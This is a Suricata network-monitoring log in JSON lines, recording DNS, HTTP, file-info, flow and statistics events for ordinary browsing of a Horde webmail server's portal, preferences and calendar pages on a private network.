{"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:53.407533+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069}} {"timestamp":"2020-02-29T00:19:54.289397+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20245,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:54.318794+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":6}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:54.486048+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420}} {"timestamp":"2020-02-29T00:19:54.546998+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":7}} {"timestamp":"2020-02-29T00:19:54.551367+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:19:54.554322+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":8}} {"timestamp":"2020-02-29T00:19:54.597358+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:19:55.763423+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:19:55.770899+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34888,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.000619+0000","flow_id":1633039675901026,"event_type":"flow","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":3051,"bytes_toclient":7364,"start":"2020-02-29T00:18:17.541794+0000","end":"2020-02-29T00:18:55.933107+0000","age":38,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:56.475426+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38217,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.485020+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64999,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:56.642413+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343}} {"timestamp":"2020-02-29T00:19:57.000487+0000","flow_id":2049226304089160,"event_type":"flow","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:18:51.093256+0000","end":"2020-02-29T00:18:56.301439+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:57.000707+0000","flow_id":1364947804081477,"event_type":"flow","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:55.970053+0000","end":"2020-02-29T00:14:56.074979+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:57.419022+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59908,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:19:58.719665+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47452,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:58.754771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":9}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:58.896827+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359}} {"timestamp":"2020-02-29T00:19:58.927557+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":10}} {"timestamp":"2020-02-29T00:19:58.969268+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:19:58.971477+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":11}} {"timestamp":"2020-02-29T00:19:58.971771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} {"timestamp":"2020-02-29T00:19:59.000281+0000","event_type":"stats","stats":{"uptime":14851,"capture":{"kernel_packets":137189,"kernel_drops":0},"decoder":{"pkts":137198,"bytes":94135989,"invalid":192,"ipv4":135655,"ipv6":10,"ethernet":137198,"raw":0,"null":0,"sll":0,"tcp":130176,"udp":5272,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2830,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2846,"synack":2837,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1867,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2413,"failed_udp":112},"tx":{"http":4783,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2495}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21167,"memcap_state":0,"memcap_global":0},"http":{"memuse":110192,"memcap":0}}} {"timestamp":"2020-02-29T00:20:01.647446+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8574,"tx_id":1}} {"timestamp":"2020-02-29T00:20:02.578245+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34892,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:20:03.976837+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":12}} {"timestamp":"2020-02-29T00:20:04.468667+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62219,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:05.093693+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.103615+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382}} {"timestamp":"2020-02-29T00:20:05.261009+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.262166+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:20:06.000228+0000","event_type":"stats","stats":{"uptime":14858,"capture":{"kernel_packets":137242,"kernel_drops":0},"decoder":{"pkts":137243,"bytes":94148933,"invalid":192,"ipv4":135700,"ipv6":10,"ethernet":137243,"raw":0,"null":0,"sll":0,"tcp":130215,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1868,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4788,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21497,"memcap_state":0,"memcap_global":0},"http":{"memuse":54359,"memcap":0}}} {"timestamp":"2020-02-29T00:20:09.000660+0000","flow_id":347324023631198,"event_type":"flow","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.716126+0000","end":"2020-02-29T00:15:08.826187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 